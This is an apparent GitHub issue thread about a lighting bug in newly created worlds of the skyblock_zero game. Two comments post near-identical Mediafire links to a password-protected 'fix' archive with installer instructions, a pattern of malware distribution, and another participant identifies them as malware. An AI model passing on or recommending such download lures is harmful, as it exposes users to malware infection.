### ISSUE TITLE
Lighting glitch when world first created

### ISSUE THREAD

**Issue by theidealist101** [ChefZander/skyblock_zero#27]
specifically, when you make a new world and start placing things around the core the light doesn't spread properly, everything's just dark instead, and you have to update it by placing and removing another light source nearby

**Comment by 13a10D** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by theidealist101** [comment]
uhhh what is this

**Comment by TheEt1234** [comment]
> uhhh what is this

its malware

**Comment by theidealist101** [comment]
figured as much

**Comment by TheEt1234** [comment]
hm maybe this is some voxelmanip skill issue where zander didnt write the light data
